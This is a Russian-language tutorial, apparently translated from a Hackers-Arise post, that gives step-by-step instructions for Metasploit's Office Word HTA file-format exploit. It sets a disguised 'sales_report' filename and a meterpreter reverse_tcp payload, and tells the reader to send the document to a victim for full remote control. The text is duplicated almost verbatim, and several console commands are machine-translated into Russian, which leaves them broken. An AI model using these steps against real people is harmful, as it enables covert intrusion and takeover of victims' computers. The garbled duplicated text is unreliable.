Добро пожаловать обратно, мои начинающие хакеры!
По мере того, как разработчики операционных систем всё больше внимания уделяют безопасности, эксплойты операционных систем встречаются всё реже. Не настолько редко, чтобы мы их больше не видели (см. ExternalBlue и уязвимость .NET CVE-2017-8759 ), но достаточно редко, чтобы хакеры сосредоточили свои усилия на приложениях и их выходных файлах для эксплуатации. К ним могут относиться файлы PDF, .doc, rtf, .jpg, .lnk и .xls. Такие эксплойты называются эксплойтами «формата файла», поскольку они используют определённый формат файла.
В Metasploit имеется множество эксплойтов для этих форматов файлов. Чтобы найти их, перейдите по ссылке:
/usr/share/metasploit-framework/modules/exploits/windows/fileformat
В каталоге Metasploit можно найти множество эксплойтов, соответствующих категории форматов файлов. Один из лучших и самых последних известен как эксплойт Office Word hta.
Этот эксплойт, впервые обнаруженный в конце 2016 года, позволяет нам создавать тщательно продуманный документ Office, который при открытии жертвой внедряет руткит в ее систему и предоставляет нам полный контроль.
Давайте рассмотрим этот эксплойт в этом уроке.
Шаг №1 Запустите Kali и откройте Metasploit
Шаг №2. Поиск эксплойта Office Word hta.
Теперь, когда консоль Metasploit открыта, давайте поищем этот эксплойт.
msf> тип поиска: формат файла эксплойта
Как видите выше, Metasploit выдал большое количество эксплойтов, но я выделил «Вредоносный Office Word, вредоносный HTA Execution». Именно его мы и будем использовать.
Шаг 3. Загрузите эксплойт Office Word HTA
Давайте теперь загрузим этот эксплойт.
msf > используйте exploit/windows/fileformat/office_word_hta
Теперь, когда эксплойт загружен, давайте посмотрим на информацию об этом эксплойте.
MSF > информация
Как видите выше, этот эксплойт создаёт вредоносный RTF-файл, который позволит нам выполнить наш код на целевой системе при его открытии. Именно этого мы и хотим!
Шаг №4. Показать параметры
Следующий шаг — рассмотреть наши варианты реализации этой уязвимости.
msf > показать параметры
Как видите, нам нужно задать ИМЯ ФАЙЛА (по умолчанию msf.doc. Не очень-то скрытно), URIPATH и SRVHOST.
msf > set FILENAME hackersarise_sales_report
msf > set URIPATH hackersarise
msf > установить SRVHOST 192.168.1.115
Шаг №5. Установка полезной нагрузки
Следующий шаг — задать полезную нагрузку, которую мы хотим внедрить в целевую систему при открытии файла. Давайте выберем наш мощный и надёжный /windows/meterpreter/reverse_tcp.
msf > set PAYLOAD windows/meterpreter/reverse_tcp
Когда мы еще раз «покажем параметры», мы увидим, что нам нужно установить полезную нагрузку LHOST.
Давайте установим его в нашу систему Kali
msf > установить LHOST 192.168.1.115
Теперь нам остаётся только ввести эксплойт , и Metasploit сгенерирует файл hackersarise_sales_report и поместит его в каталог /root/.msf4/local . Затем он запустит сервер по адресу 192.168.1.115 на порту 8080. Теперь нам остаётся только отправить файл целевой машине, открыть его. Она подключится к нашему серверу, загрузит meterpreter и подключится к нашей системе Kali, предоставляя нам неограниченный доступ к её компьютеру.
Мы должны получить приглашение meterpreter, подобное приведенному выше.
По мере того, как разработчики операционных систем всё больше внимания уделяют безопасности, эксплойты операционных систем встречаются всё реже. Не настолько редко, чтобы мы их больше не видели (см. ExternalBlue и уязвимость .NET CVE-2017-8759 ), но достаточно редко, чтобы хакеры сосредоточили свои усилия на приложениях и их выходных файлах для эксплуатации. К ним могут относиться файлы PDF, .doc, rtf, .jpg, .lnk и .xls. Такие эксплойты называются эксплойтами «формата файла», поскольку они используют определённый формат файла.
В Metasploit имеется множество эксплойтов для этих форматов файлов. Чтобы найти их, перейдите по ссылке:
/usr/share/metasploit-framework/modules/exploits/windows/fileformat
В каталоге Metasploit можно найти множество эксплойтов, соответствующих категории форматов файлов. Один из лучших и самых последних известен как эксплойт Office Word hta.
Давайте рассмотрим этот эксплойт в этом уроке.
Шаг №1 Запустите Kali и откройте Metasploit
Шаг №2. Поиск эксплойта Office Word hta.
Теперь, когда консоль Metasploit открыта, давайте поищем этот эксплойт.
msf> тип поиска: формат файла эксплойта
Шаг 3. Загрузите эксплойт Office Word HTA
Давайте теперь загрузим этот эксплойт.
msf > используйте exploit/windows/fileformat/office_word_hta
Теперь, когда эксплойт загружен, давайте посмотрим на информацию об этом эксплойте.
MSF > информация
Как видите выше, этот эксплойт создаёт вредоносный RTF-файл, который позволит нам выполнить наш код на целевой системе при его открытии. Именно этого мы и хотим!
Шаг №4. Показать параметры
Следующий шаг — рассмотреть наши варианты реализации этой уязвимости.
msf > показать параметры
msf > set FILENAME hackersarise_sales_report
msf > set URIPATH hackersarise
msf > установить SRVHOST 192.168.1.115
Шаг №5. Установка полезной нагрузки
Следующий шаг — задать полезную нагрузку, которую мы хотим внедрить в целевую систему при открытии файла. Давайте выберем наш мощный и надёжный /windows/meterpreter/reverse_tcp.
msf > set PAYLOAD windows/meterpreter/reverse_tcp
Когда мы еще раз «покажем параметры», мы увидим, что нам нужно установить полезную нагрузку LHOST.
Давайте установим его в нашу систему Kali
msf > установить LHOST 192.168.1.115
Теперь нам остаётся только ввести эксплойт , и Metasploit сгенерирует файл hackersarise_sales_report и поместит его в каталог /root/.msf4/local . Затем он запустит сервер по адресу 192.168.1.115 на порту 8080. Теперь нам остаётся только отправить файл целевой машине, открыть его. Она подключится к нашему серверу, загрузит meterpreter и подключится к нашей системе Kali, предоставляя нам неограниченный доступ к её компьютеру.
Мы должны получить приглашение meterpreter, подобное приведенному выше.